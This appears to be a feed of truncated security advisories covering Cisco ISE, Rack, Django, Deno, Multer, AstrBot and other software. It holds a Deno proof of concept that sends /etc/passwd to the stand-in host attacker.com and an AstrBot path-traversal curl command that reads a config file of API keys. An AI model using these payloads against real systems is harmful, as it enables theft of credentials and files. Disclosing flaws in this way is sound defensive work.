#vulnerability

Cisco has released security patches to address a critical security flaw impacting the Identity Services Engine (ISE) that, if successfully exploited, could allow unauthenticated actors to carry out malicious actions on susceptible systems. The security defect, tracked as CVE-2025-20286, carries a CVSS score of 9.9 out of 10.0. It has been described as a static credential vulnerability. "A

### Summary There is a denial of service vulnerability in the Content-Disposition parsing component of Rack. This is very similar to the previous security issue CVE-2022-44571. ### Details Carefully crafted input can cause Content-Disposition header parsing in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. This header is used typically used in multipart parsing. Any applications that parse multipart posts using Rack (virtually all Rails applications) are impacted. ### Credits Thanks to [scyoon](https://hackerone.com/scyoon) for reporting this to the Rails security team

An issue was discovered in Django 5.2 before 5.2.2, 5.1 before 5.1.10, and 4.2 before 4.2.22. Internal HTTP response logging does not escape request.path, which allows remote attackers to potentially manipulate log output via crafted URLs. This may lead to log injection or forgery when logs are viewed in terminals or processed by external systems.

### Summary Static imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network. ### Details Static imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways, when third-party code is directly/indirectly executed with `deno run`: 1. The simplest payload would be a tracking pixel-like import that attackers place in their code to find out when developers use the attacker-controlled code. 2. When `--allow-write` and `--allow-read` permissions are given, an attacker can perform a sophisticated two-steps attack: first, they generate a ts/js file containing a static import and in a second execution load this static file. ### PoC ```ts const __filename = new URL("", import.meta.url).pathname; let oldContent = await Deno.readTextFile(__filename); let passFile = await Deno.readTextFile("/etc/passwd"); let pre = 'import {foo} from "[https://attacker.com?val=](https...

**Overview** The Auth0 Wordpress plugin contains a critical vulnerability due to insecure deserialization of cookie data. If exploited, since SDKs process cookie content without prior authentication, a threat actor could send a specially crafted cookie containing malicious serialized data. **Am I Affected?** You are affected by this vulnerability if you meet the following preconditions: 1. Applications using the Auth0 WordPress plugin, versions between 5.0.0 BETA-0 to 5.0.1. 2. Auth0 WordPress plugin uses the Auth0-PHP SDK with version 8.0.0-BETA3 to 8.3.0. **Fix** Upgrade the Auth0 WordPress plugin to the latest version (v5.3.0).

### Impact A vulnerability in Multer versions >=1.4.4-lts.1, <2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process. ### Patches Users should upgrade to `2.0.1` ### Workarounds None ### References https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9 https://github.com/expressjs/multer/issues/1233 https://github.com/expressjs/multer/pull/1256

### Summary An **unauthenticated information disclosure vulnerability** exists in the PSU deployment of HAX CMS via the `haxPsuUsage` API endpoint. This allows **any remote unauthenticated user** to retrieve a full list of PSU websites hosted on HAX CMS. When chained with other authorization issues (e.g., HAX-3), this could assist in targeted attacks such as unauthorized content modification or deletion. --- ### Details The endpoint [`https://open-apis.hax.cloud/api/services/stats/haxPsuUsage`](https://open-apis.hax.cloud/api/services/stats/haxPsuUsage) returns a list of websites on the PSU instance of HAX CMS. This endpoint is exposed without any authentication or authorization checks. The source of the issue is in the `haxPsuUsage.js` file, which appears to directly serve the site listing without verifying user identity or access level. This enables anyone with the endpoint URL to enumerate all site instances under the PSU deployment. This endpoint may have originally been used f...

When verifying signatures with X509 certificate validation turned off and HMAC shared secret set (`signxml.XMLVerifier.verify(require_x509=False, hmac_key=...`), prior versions of SignXML are vulnerable to a potential timing attack. The verifier may leak information about the correct HMAC when comparing it with the user supplied hash, allowing users to reconstruct the correct HMAC for any data.

### Impact This vulnerability may lead to: * Information disclosure, such as API keys for LLM providers, account passwords, and other sensitive data. ### Reproduce Follow these steps to set up a test environment for reproducing the vulnerability: 1. Install dependencies and clone the repository: ```bash pip install uv git clone https://github.com/AstrBotDevs/AstrBot && cd AstrBot uv run main.py ``` 2. Alternatively, deploy the program via pip: ```bash mkdir astrbot && cd astrbot uvx astrbot init uvx astrbot run ``` 3. In another terminal, run the following command to exploit the vulnerability: ```bash curl -L http://0.0.0.0:6185/api/chat/get_file?filename=../../../data/cmd_config.json ``` This request will read the `cmd_config.json` config file, leading to the leakage of sensitive data such as LLM API keys, usernames, and password hashes (MD5). ### Patches The vulnerability has been addressed in [Pull Request #1676](https://github.com...

A buffer overflow vulnerability exists in the mstp.ko kernel module, responsible for processing BACnet MS/TP frames over serial (RS485). The SendFrame() function writes directly into a statically sized kernel buffer (alloc_entry(0x1f5)) without validating the length of attacker-controlled data (param_5). If an MS/TP frame contains a crafted payload exceeding 492 bytes, the function performs out-of-bounds writes beyond the allocated 501-byte buffer, corrupting kernel memory. This flaw allows local or physically connected attackers to trigger denial-of-service or achieve remote code execution in kernel space. Tested against version 3.08.03 with a custom BACnet frame over /dev/ttyS0.